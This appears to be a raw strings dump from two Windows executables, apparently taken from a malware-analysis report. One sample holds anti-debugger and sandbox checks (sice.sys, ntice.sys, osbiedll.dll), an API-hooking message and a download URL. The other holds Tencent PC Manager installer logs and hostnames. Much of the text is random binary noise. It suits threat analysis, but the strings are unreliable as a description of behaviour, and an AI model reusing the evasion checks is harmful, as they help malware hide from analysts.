.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
sice.sys
siwvid.sys
ntice.sys
iceext.sys
syser.sys
osbiedll.dll
]52 %d-%d-%d
winhttp.dll
activation.php?code=
deactivation.php?hash=
2_.af
.ju57-
mj`2.Rh
'.Dut$
%fv3A
c.hnv
a%x9:T
%FKwPAM
B=h%x}
j6R.JP
.?.HS
@2ssHb
20W.Yz(
\Z.eQ #A
a%FO@x
\Z%%.YX%C
4.rnN
.wwwm
,{4d%d
%uP%JY_P
/C.wX<
NH%c^p
msG"<z
8.Jlo
b%s1R"
rJ[%f
)m"%F
5#l
{%U#'
-}.hi
.BBJmh
%u`M'
-h}".f
.FAL,
-MJk}
n.iS>N
f.cH|
Y-L%Xq
*pL
}".Sp
%d`/q
\.yTE
aUF%s
v.YV]8
5fq%D
^d.KF
[f%_7"y%UA
%DZ}o$
Ye3%SO
h`.Cl
.UvPA{]
a.CSZEs
.FD1{u
%n{.le
6W:%f
Ól%
TF%d=g
.DoqO
U.BMRAB
{crT3g
.yQ?wy
-RZ}P@
:>?.eo8
%D o*
.Kb\Lf
@%x6Jj
6k.qu
{/.qu
}du\z;qs.qu
}duP{%S
%u0}du
>%u!}du
-nui}du
%u[}du
EP.xu
%up}duI~
%'.qu
B,3.wu
4@6%u#}du
i%\$u.xdu
\uDpdu
.nxcu
%u%}duo
*.Zmu
}du-B}
%uG}du
?2%uIqdu
.tuY}du
0%ud}du(.a
W}%u0}du`
;Vt.ju
hO=.lu
2..Du
oL.rku
gr.Iu^
Uh.bu}}du0"
}du.YF
i^?.Ou
%uZ}du%
i4)ku1}duRld:
mf.Jdu
%u"ydu
-cua}du
jN:Lu.xdu
o%u\~du
K'%soau
|du%C
%u`}du
%uRldu&
@u.ydun
}du.WW
Reu5}duÒ,
%u }du
Tt3%u
.au}|du
3J%du
%uMydu[
}du%d
%u'~du
LM5%u
%uT}du
%s>qu
<J%uw}duL
|du%u
n^u%xdu3
$?.Ju
.X%uC
%uY|du$[QN
%u4xdu
L%ug}du*
.Bu{}du!
(?%uE}du
%uD}du
3M%zu.ydu~
ly%fu
\)S.zu
O%uP|du9
}du.Qo
-kmu}}du
A\.cOu
%uF}du
%xu%}du
.Gp;nu
%u1}du
5R.mu
D?<%u
BM.yhu
%uk~du
%u'yduJ)
}duwW=lls%u
}dudPU
cQ.Iu
.QhMu
?%x`u
%uZydugN
>Zo.pu
%us}du
%um~du
(tx%u
%d'qqu
5a4%u$}du
%uX}du
-WcuW}du
|%u;}du
oy%ut}du
jlj%uq}du-
k.pOu5udu
%uV}duU
C*[email protected]
:w.lu
Ik%u=}du
}dudpb
%uH}du
}du.xy
LLv.kcgBn
"0.Os
.NoR|l
<%Sf{4
.JY6Z
(yv-4}q
U.aH0lt>
Yb,
X%UKm&
f/3d.vr
f-?%f
Z^$.Rw
z%f?4~
nf.sG
uQ'%cQ]&
..xt3
n.IUn
E5.dJ
vx%uL
C.XI5
h=%0x$(
atU.Mt
j'ò
[Z%fN
%x(HQ
).GOKI
B.Vv=!
d,%f;
rVp .iF?V
!G
l6R%F
VY3r%u0&
_^I]).YU
%s06Z&Ko\
%cJ<Z&
.eNLB
1%U<hx
KG%FI{
}.Uq}
&u.ydu
=.XlCu>}duqs
r.Iu^
>.ymbu
Qu.Ju
0..Du
Tox%u
du.KR
9E.XDu
%uT}duX
b%uS}du
%uV}du
}duDp}n}
lj%uq}du
gQ.Iu
%u=ydu
}duqY.lBDbu
}du.ns
.CU*Zu
n~h%u
%us}du5
PZ/$!%u
}du.Pu
}dum.Mz)
.Bu{}du
%um~du)
L%ug}du
|%R_U%u
O%uP|du
%u }du_z
}durl
}duGZ{5.Jxu
|duQ%F
%u9ydu\
Xu.ydu
@6%u#}du
Ou.ydu${
<J%uw}du
%u[}duO
?2%uZydu
~Obve%u
Ik%u=}duGI
~duH%D
.Fqul}du
2(?%uE}du
%u'ydu
.AQyu
.Qldu
Fa.fu
0%ud}du
j907n%u
G&.su
]%uZ}du
%uZ}du
-).Ou
%uG}duD
rR.pOu
~_uwxduDp
M`.Mu
}du2IGDa4%u$}duf]%t
%u%}du
*R~%u
%uH}du<7_
xdu.lWN
%xu%}duI
%Du!}du
%R%uL}du-F
%uS~du
>%u!}dun
O.X%uC
%up}du
%u\|du
&)%uqydu
W}%u0}du
p.Mbu
%uY|du
cg%uL~du
wtx%u
}duO%X
%uk}du
OLEACC.dll
.yY5s
Z%CJ<[%
gdiplus.dll
.VZMY8Gt
SHLWAPI.dll
Z.Xk=[.
ADVAPI32.dll
FI.KJ
<ewv"%u
C5A.ti
a\~$t.Jc
qa[$COMCTL32.dll
COMDLG32.dll
h.Epo'
OLEAUT32.dll
SHELL32.dll
|KERNEL32.dll
ShellExecuteW
=l%x^(
2M;,%F
)`}.OO
c.IDE
7.MTi
wD%uFYq"
%x6M]p[1T
<Y.EY
<V%fY
]%.NrrK@
4a.Ji
.MBEp)
!=9: &0'
eO.TB
qk.TP
9..QQU
7&.CC4
FTI.FY
~*%C!jI
dEa/.bh
(,q%d_
K.pWQ
IgM%s
y%X-r
-CP}TiJ\
tcPa
ssHv}
|g.ki
.Rx}ks#
4>.Me
E.ZQS
xCrT
!mV%D
dq!y.%s
CFtp
%)H#c|.wU
.ZPD~1
|.GU3
o~%S<
S.VM5\
.AF N1
#%uJ,
..OYk
%XD^v
')].HrR-?
y.cq,
30.ZT
n1.If
q%f*YN
&X(~v%dj
%cz~[
Y.gzOW
2M.ZH]
.fK9q
^Fq
v=^yó
.uC/:
s<s9yG%u
a.uJE
c8oD.ud
!Y.lk%K
?L%xj
m.WZE
g.blu
%D!P8_
.wRF"
.RP(s
2.Awg
.oK',
$,%U~
.ChWg
{.gCE
M..Ii
%fS]!4k7
g%C%:
$%XR'
R!U%S
3,-C}
.esFq9
%xXoU
.Aw T
.eU8#
q.ds/
~`p.Qn]
.ZKQfn>=
1.WHj!
.eLs)B
{;n.Ls
:<u%d
P/.fXwR
\#.Ch
4l]*l.gE
%C%yk~
-B}#$
e.ZjJ
M2N.qhA3
,.VK4
H{.CA
v??%uu)
&).Do
ýS}
yv%sxxT4F
i.Vr86
 .FY=
c@Ù%
%f)In
2v.gl
;oVq)%X
a/5\z.RLFXLUp
IKK$%C
.jGHp
%)S%s
P%XR{{
.Zhzrh@
-.DhA
WuRL
4I.Ab
!{.uRJyc
P.ZTP
\.ca5
Vkey
<f
09'%u
.sB\\%
Zr'h%d
>z.sV
N_%X'
L%S{@
n%.Qv
{e.ie
"oa.CgH
WebY9
,Y;]%XR
ðjX
<.wV;V^L-
F.qhyT
T{j%d
.vJ]K
j.mRoS.
KE.aR?L
IZ.Ji
0W%CQ
OM.ah;
'%2u"
$2.hfQ
:.kdP
31j.fE
=n.rH
[.Nu[
%Dta8]A
^%SmAt
.oTI(
IL.Cj$
.eRUU&
I>.iq
\.owNO
.UeAqDP6
%xj9-
.SDHGn
'\.tE4
Ar%cwe
n*P-j}
L2%fG
.ZTvv$
(J.Qz
5S.QC
9Or%dV
oUdp
%dzst
Þ=P
\|c.zi
r/%Sv
Ml1%Sf[
÷r!y, /
.KfQW
%SS)*Y
*.ZCG
I.MR7
.FOJ5
].YCB2:
HT.Hz
KEy]Z
3/sZ%d
WINMM.dll
GetViewportExtEx
GDI32.dll
MSIMG32.dll
6%8u8
:(:3:#;.;
1#1'1 1=1
1-1A1}1
2?3
6b6`6|6
;(<9<'=5=
8Œ8y8
3/425>5~5
3"343&4]4
6*7074787<7
2<3
6_7$8.8\8
? ?$?(?,?0?4?8?<?@?
: :$:(:,:0:4:
< <$<(<,<0<4<
8 8$8(8,80848
8 8$8(8,808
4044484<4
3(3,30343
? ?$?(?,?0?4?8?<?
*:.:2:6:
=0=4=8=@=
0 0$0(0,0004081<1
8 8$8(8,80848~8
: :$:(:,:
424?4=617}7
M7.PaTq
IMM32.dll
%SS1=1S
?m.mE
.uW.]
Q|rm%X
.nJqi
eMj%S
H/Z(.ri
T%CwF
3d;".of
\.kAX[
.yhs\
.Qw&/1
6V.OD a
.WzZ-
.lA-PU
.UeSGe,
g$7Y%F
0GG.njz
[email protected]
] `toj%S^9
/.McS
(3%s~
y.JNYl
w_ %S1
U'%F"
^.Hr1e
%c.||GL2
H39Pü
QJ>.Lx
.ijZGg
5W%XjVB
.Zv(XC
efPCcRt
ptcp_
2.d%f
^.cv}
?H%x!!H
%XgPX.
Rl%u&
lCmD%
a-C}0
9(.bh
nt6`1ZUS%X5
h.GP"
wX>?L0!..wh
C%fw*
%c%sY
<".ZM}6
E.ZkW
%FV?J
LhXXp://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
hXXp://pki-ocsp.symauth.com0
ehXXp://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crl0
WTSAPI32.dll
WINSPOOL.DRV
%c#pJ
-vO}|
WININET.dll
USER32.dll
SHDeleteKeyA
L5.%X
B%ds9
T$?%US
-B};8G
%sXQ#
}gwEB3
$2(2,20242
,rrr,^^^-NNN.AAA.777.....%%%. .
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
ADSafe.lnk
$.qmgc
hXXp://union.baidu2019.com/qq/1.txt
WAdvapi32.dll
*.lnk
accKeyboardShortcut
hhctrl.ocx
SHELL32.DLL
dwmapi.dll
UxTheme.dll
NRICHED20.DLL
mscoree.dll
ekernel32.dll
Error at hooking API "%S"
Dumping first %d bytes:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cannot %s server %s
Error: 0x%X
The procedure entry point %s could not be located in the module %s
Cannot load file %s
Error: %d

qqpcmgr_v11.4.17339.217_90008_Silence.exe_296:

.text
`.rdata
@.data
.rsrc
aSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
mscoree.dll
.mixcrt
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
kernel32.dll
operator
GetProcessWindowStation
USER32.DLL
KERNEL32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
D$.UPf
SSSh`KO
SSShpPO
QSShdQO
8%uNP
t.hhtO
.hXhO
PSSSSSSh
FtPWVh
G<SSh
GXSSh
G SSh
gdiplus.dll
inflate 1.1.3 Copyright 1995-1998 Mark Adler
- inflate 1.2.3 Copyright 1995-2005 Mark Adler
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
127.0.0.1
0.0.0.0
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpReadData
WinHttpCloseHandle
WinHttpOpen
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpSetOption
WinHttpSetStatusCallback
g_Install.Init ...
g_Install.Init return:%d
DbgExtraceFiles return:%d
supply is %s
handle is %s
Report SetDrPath begin...
Report SetDrPath end...
Can't Find dr.dll,Can't Load Report Instance
QQPCMgrDaemon.exe path:%s
Can't Find QQPCMgrDaemon.exe
bugreport
InitBugReportSupport
run TXSSOSetup.exe begin....
run TXSSOSetup.exe end....
Can't Find PackageConf.dll
LoadLibrary PackConfDll.dll
OpenSelfProtect: Begin, Run QQPCRTP -e
LoadRtp: Begin, Run QQPCRTP -s
LoadRtp: QQPCRTP.exe -s, return: %d
LoadRtp: End, Success=%u
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
StopRTPService return:%d
ClearRTPService return:%d
Run Uninst.exe....
install success, install cost time:%dms
KInsall::ParseConfig return:%d
Setup.xml supply is %ws
KInsall::ParseDriver path:%ws, cmd:%ws, wait:%d, show:%d
UpdateSelfProtect, Enter, bEnable=%d
UpdateSelfProtect, Leave, bEnable=%d, bResult=%d
UpdateTrayIcon.exe %ws
AddQMFontResource CopyFile %ws error, last error is %d
AddFontResource error. lasterror is %d
0,0,-0,-0
0,0,-0,%d
0,-%d,-0,-0
CheckExeFile Defence Data: %ws
LoadImageToMem CreateFile error:%d, path:%ws
GetPacketData %d
GetPacketData return:%d
ExtractMemoryFiles return:%d
Extract return:%d
ReadMem new error:%d
m_pFileBuffer new error:%d
ReadFile new error:%d
ReadMem error:%d
...return
return:%d
g_App.Run...
g_App.Run return:%d
crtext
fontnameKey
QQPCRTP -t ...
QQPCRtp -t return: %u
QQPCRTP -t OK
QQPCRTP Stop begin
QQPCRTP Stop end
QQPCRTP CloseProcessByFile ok
QQPCRTP CRTPService::Remove: %u
KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws
Terminate Process return:%d, error:%d, pid:%d, path:%ws
skin%d
sub%d
waitGif%d
sGif%d
hGif%d
IDR_KAV_MSG_BOX
msgboxbg2
OnInstallProgress nProgress:%d
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
MoveFileEx Rename file fail, error:%d
TryCreateFile %ws, error:%d
masterconn11.qq.com
CreateIReportClient
ReleaseIReportClient
QMTProcess::CloseProcessByID ;%d
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
strings.xml
fonts.xml
xmls.xml
images.xml
%d.%d.%d.%d
master.etl.desktop.qq.com
mainexename
keyname
keyvalue
mainkey
subkey
pdlxf.qq.com
fs_tcp_conn.qq.com
stun.qq.com
xuanfengnet.qq.com
fs_hello.qq.com
fs_conn.qq.com
fs_h2u.qq.com
fs_report.qq.com
(%d) d:d:d.d000 %s: %s
D:\jenkins_Trunk\workspace\Mainline_SourceJob_2\qqpcmgr_proj\Basic\Output\BinFinal\QQPCMgrPacket.pdb
GetWindowsDirectoryW
GetKeyState
USER32.dll
GDI32.dll
RegCreateKeyExW
RegOpenKeyW
RegOpenKeyExA
RegLoadKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ShellExecuteW
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
InternetOpenUrlW
HttpQueryInfoW
WININET.dll
VERSION.dll
NETAPI32.dll
CreatePipe
CreateNamedPipeW
EnumWindows
zcÁ
.?AVCHttpDownloadImp@@
.?AVCWinHttpFile@@
.?AV?$CWHRoundRectFrameHelper@VKmsgbox@@@@
.?AV?$CWindowImpl@VKmsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@
.?AV?$CKuiDialogImpl@VKmsgbox@@VCKuiDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@
.?AVKmsgbox@@
.?AUICryptoSetPassword@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AUICryptoGetTextPassword@@
.?AUCBodyData5001@QMReportMgr@@
.?AV?$CSingleton@VCReportManager@QMDQMReportMgr@@@utils@@
.?AVCReportManager@QMDQMReportMgr@@
.?AVCCmdLine@QMDDetector@@
.?AVCHttpDownadAdpator@QMDHttpDownload@QQDectector@@
.?AVCHttpDownloadSink@QQDectector@@
.?AVCHttpDownloadImp@QQDectector@@
.?AVIHttpDownload@QQDectector@@
.?AVCWinHttpFile@QQDectector@@
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
.QMGuid
@.reloc
]@ ]( ]8
TS:%lld ID:%d EC:%d ad:%0X Log:%s
Sid:%d TS:%lld ID:%d EC:%d ad:%0X Log:%s
StartupLog_1.log
dr_packet.dat
dr.ini
c_%d = %d
domain_name_%d = %s
qqpctray.exe
nettest.exe
125.39.120.82
113.105.95.120
ADVAPI32.DLL
\GlobalMgr.db
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
D:\QQPCMgr\fthardware\Output\Binfinal\dr_ind.pdb
NetWkstaTransportEnum
dr_ind.dll
.?AVIReportClient@ClientDataReport@@
.?AVReportClientImpl@ClientDataReport@@
.?AV?$Thread@U?$BindMember0@VTransportMgr@DataTransport@@P812@AEXPAX@Z@fund@@@fund@@
0$0(0,000
8%8U8
.Class 3 Public Primary Certification Authority0
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
hXXp://ocsp.verisign.com0>
images/1.png
.nh7<
.OT}y
images/10.png
images/11.png
1]D%x
images/12.png
images/13.png
cRtE
images/14.png
Q.qrB
images/15.png
G.Oby
images/16.png
.VMQN
images/17.png
images/18.png
.cb`%
images/19.png
7%Ss;w
images/2.png
j.ru[Ur7)
images/20.png
images/21.png}u
.%%Xu
images/22.png
images/23.png
images/24.png
images/25.png}qw4
images/3.png
i%Sh%
images/4.png
.jB&P
images/5.png
R.ZJj
images/6.png
images/64.png
images/65.png
images/7.png
)L%xQ
images/8.png
_a.mz
images/9.png
images/Big.jpg|
.cy"?r>
y .du
XB%Cs
.rQJP
images/Big.png
images/BigButton.png
images/BlackHor.png
images/BlackVer.png
images/checkbox.png
images/closebtn.png
images/closebtn2.png
images/customDlgDown.png
images/customDlgDownhover.png
images/customDlgUp.png
images/customDlgUphover.png
images/h1.png
images/h10.png
images/h11.png
u.vba
-inKq}_
images/h12.png
images/h13.png
images/h14.png
images/h15.png
images/h16.png
images/h17.png
.yrSz=
images/h18.png
@.qK>
images/h19.png
images/h2.png
E%C`qZ
images/h20.png
l@`%D
images/h21.png
images/h22.png
images/h23.png
images/h24.png
images/h25.png
~U%UY
images/h26.png
~.sr#
images/h27.png
%D,Q/
images/h28.png
images/h29.png
images/h3.png
images/h30.png
a.aqc$D
images/h4.png
*!jU%U
images/h5.png
images/h6.png
n|*%F
images/h7.png
IQY%u
images/h8.png
images/h9.png
images/minbtn2.png
Yy.nN{
images/minhover.png
images/minnormal.png
images/mouseover_Bgd.png
images/msgboxbg.jpg
images/msgboxbg.png
images/msgboxbtn.png
images/progress_bar_bg.jpg
images/progress_bar_bg.png
images/progress_bar_value.jpg
images/progress_bar_value.png
images/radio.png]
images/RightBg.png
images/s1.png
images/s10.png
images/s11.png
images/s12.png
images/s13.png
images/s14.png
%u>*CO
images/s15.png
.hsp<
images/s16.png
images/s17.png
images/s18.png
/*.ip
images/s19.png
images/s2.png
images/s20.png
Z).dH
images/s21.png
images/s22.png
images/s23.png
nCRt
images/s24.png
images/s25.png
images/s26.png
images/s27.png
images/s28.png
.Yz1d
images/s29.png
images/s3.png
images/s30.png
.Hab];
images/s4.png
images/s5.png
fÛw
images/s6.png
images/s7.png
images/s8.png
images/s9.png
images/Setup.pngeW
images/SmallButton.png
o.Dr5
images/Start.pngEVy4
images/textbgr.png
images/unfold_Bgd.png
images/wording.png
images/wording1.pngm
%S$5nBc<
.jq9;
images/wording2.pngm[UT
R;h%X#M
0Þ7
images/wording3.pngUw
%x)|y
images/wording4.pnguyeP
images/wording5.png
images/wording6.png
H.iz%
images/wording7.png
.iv~(
res/def_skin.xml
res/def_style.xml
.HubMM
res/dlg_finishwnd.xml}R
res/dlg_main.xml
res/dlg_msgbox.xml
res/dlg_new.xml
images/21.png
images/25.png
images/Big.jpg
images/radio.png
images/Setup.png
images/Start.png
images/wording1.png
images/wording2.png
images/wording3.png
images/wording4.png
res/dlg_finishwnd.xml
()))....
89(95((0
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Microsoft.Windows.HummerSetup" type="win32"></assemblyIdentity>
Hummer Setup EXE
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
;.VxJ
,v.fL
#O}.IhZ
Ak.sc
7.yci
-x}i.
.HR\p;/
.kh9*
F.cwp
:?%D/
zk.yM
Fk.WC
J%xRe
YL.idX'
_.jJ`s
l".YEZ]
MO*d<%x
b.HJ[
.zsaG
.BD-b
.rDA[
quRl
.Qs3~
Y*.od
\%s]8
D4 [x.Kg
O:\R? -W
r.eh^
m%czB
U#H%S
OhmGZ%F
?.KFdj
g%Xb:
.kSCPM
.oW5r
%q.tg
.zeyB
%D=El
*B{%Cm
.GC0oQ^$
w_ %UC
.jqfXG,@
9.oc%a
D\e.pNdC
n%XbW
j*dh%F/t^1Z
a&.Uz\
I.CVz
4"exeV
p.VrcQ
\V.tE
W>.ZI
p.Rpw
j3=.aY
4.VN[/9
.eAG*
>w.bR
.dCZm
&.wut
-C}9n
c%7Si ~
t.aIQ8
*.Le[
.KEba]
E`.Ey5Shv:b
;[email protected]#M
m%uL|
Ivþ3
\.ezx
-Sa}W3
Sg.xf@G
.qQ?}
r&.gc_5k
Wyd-s}w
;'.tS
Y?.gT
h)\L%D
.xF6!
~8Ù
[#o.GX
&].qkA
%D%hRjp5%[
JS%xrR
g.Zo@
6%c[@
y%F$v
ðn6
f.Gw?3
lX.EK
O2.MU
.Dk&J
g.CkG
1TCp]K
%DUrGB&
QBp%U
.zA,d
%C;HK
l.NRC.
%uA#w
.VmUt
[Yc.BG
EK YL9.kg
)U-D}Um
%3={%x
4>Jo%cq4
lW.Nw
7y.vq
t-.Rt
|Oys %F
V.drh
6%F?t
qff\%X
:Fos*.*
~\%C 
xZ.om
f[{.Mn~$
wEBHPq
$.wr^
.ZOxb
.Chln
k.UTk
A.df3!k3C
>Q%CVs2
*U6:%S
j.sYJ?
HLÜ
`.xB2yZ
s%UQs
.jW<b|0
wJ.as
[ %Xcn
.iuC ]2o
{d%t.oJ
Q=:SZ.KV
.FKC'R
`OG%%upd
.mn(F
p.ljm.x
PoR.Ozl
ME%sw
UqW.CB
.KFlv
qf.vh7
.lx(\
r.JY=
Hd z%f
jb.wf
hg:%%U
!.Kolc
9Z.Ip37.
&z.Ii(2X6t
5.uAj/
?-cE1a}5
.VG,f.
2iK<.zI
4z%2S
G@C|
.ev,0
D; %u
.ya`K
.JsMOK
9-p4}{
N).Zs
.tFS%
!\.fp
&!lU4/.TWa
.YX=K
y.VX:L
{fÜ
.puxt
?^.OY8
.ezSaX
~U.YG
M.LV"`-
.cxx:
e5%U&
c%DiW
d.piRP
!x-
z..PS
:U.JR6Ba6
.ad96
.Xi_&
>^[.TN
vuDps
kyB.VLaI
GO%FN
.Gac I
 Ú=
c]]%x
.bK]J
</.LU
dF.Pg<k
mAm$.ZL
m|.Ve
\.Yl?V$@g
~%f{#6
i-h6h}
kF.uhfC&
 94)8@;9
\.PDe
t%d%P8 )
U-p6j2}
.JrJx
.cf(g}A
%f[Cz!
K*.wWv{
-k7PE=%us
!%FHv
).CB$
'u%S./
5].KsB $3
y\3`.Ol
.vTR7
G[.cn
h.sq~
{0.qqS (\d
-N.Uw
[email protected]
.XE%i
[:%CsK
UrlB
^%s:q`
Y:\{H
_.UQ|P
%FX<s
~u6w%s-
D.mi[
%C}6|`L:;*
K{d%C
Q.te4
rj.qO
]-W,;%dz
Q.pK8!
1\.LE"I~$
PD.fs
]Ch:KxEP%D
OK,V|:%x
.SRQB
$d/?%uGYXg
".gIO
MsGljH5
.spzu"5g
N;&p.RAq
;.WCr
 J.RV
Z%U\w
mMk).le
Wt.aS
i6.SZ
%xDvv
fIÏ
G.xJ2
Xg[.LS
L^F.vXMQ
8!.JB
e.OX 
?d9.qw
.rQW]
EYE%C
r%%X>
b&%C:
("%x$j
].UV 
!WEb-
Uwb%S
X;.YX
fmSG$
{G.Kff
V.GA6-
D$%f(p
}.pK%
3lY%U
H%F )
.mqm%M
p%SFt
.Xx-$E
H.sR{
lUW%d
<t2%d
vÒ[
pC.re
.Qd;E
Dv0%c
1.mO(
.CV~Y
i>%Dl
G97.kE
^i-t};
9Ic%9s
0.bd"
.S.Stc4
?.MA^
j^.gD4
[email protected]
h)c.noZ
HD%UW
keYUL
*JY.xDb?
u--QRf}
[%u|y
}n.Pq=PU
c.Cy"
%CJKC
%Dp|y
R%.VG
%DHEiEG
.CY)2
Ch-f}#
N.ZE|
.ApKd
Ib{%C
.JT6>
IDxuT:I%S
p_p%D
.An<y
V-5Mk}"
A-d}pk
sM.CB
%uhn_
?0~%x`'
%cQ^U
,`AkeY8
EYX.va>nBO=7
$.Iq`
"7CÜ
R.tiT
U,q
]G.Dt
J*
s%X1=uq
QD.yl
K%frXo
SZ.cP
eM.FL
.wX0b
o.Dj/lO
.rpQ 
$%sg?]
Ge.UE
.YNW9
)2h=1y.XM
B9.jl]
.tf/~
Crt[R
"/%c\
ý|4
p/.FkO^
.CnO2
3.xI;
;d%u"^
N} %X
{1.MY
dI.lm/
.BqDp
K .Ym
%u[6e
g[.tg
.xh[g"
O#Rr]%f
V.hxq`
j]KeY2
LJqq}
L6-g}f
%cpgA
v.op$
v.Gzv
0.Oh@ 
.rtX:?
%x(CD
><*%UH'
ÎU1
l8p.rFY_
k}_%u
M.vdZ
# 6s-$
.EL#`
`.cI\
.z.oU9L~Z
s^.kt
.NE\k
D..LH
.OkYih=
%SZ59<
s-!G.mu9
. ;(7C/'%S
-.ee)
.bDvVm
SK.Kz
`.PWX
)`/8%u
X<ú
nd.XI
ggz%f
$S'%D
P9%S[?x
l%dXkx
%xm*d
sJ2%x
}h%9X?%
.NJyo
Œr!
&5.Wqv
%Uw'W2Pb
.NAR(n
.Yk8C0&
u%uE>=
Q.xiv
.H%1xt
,%SHH
%X{Jo
.XpIs
.kR/cn,B
`,H%S
(%S*y
.icDG
d%.nY
a%DtC
/v-%S,
aX%U7
v.AXw
1.Fkv
i#%Fl=
l.BR_
AXz:.Uj
7eh.MR
P4J%Ur
1.hL/lCz#
G%.Gt
.opz'}g
@.KBh
.TnQ5"V
oK7%X
?K%S3
T]P.fC
6/.nRu:|p
[email protected]
%xo{b
.Cq|L
BO%1uZ
crty
.Tk~vc
B{.IRo,
?sql*
2.FZ62?
F.TpHB
q.GgU'
Lx.Zgz
"{%Ug
U%fU6
=7%CG
.lIQm7
w:\EX
.TiCD
gu.mbzu
AP\%c
.JWW0
N%f,u
J'}J%s
.rv*$
'X-%X
@x>4.AV
`]{,.fR
.PO2"
3u%xIS
m%f_Ua9
^].tr}_K
.ust9
r%D=U
cQ>.lj
rt%R%UD
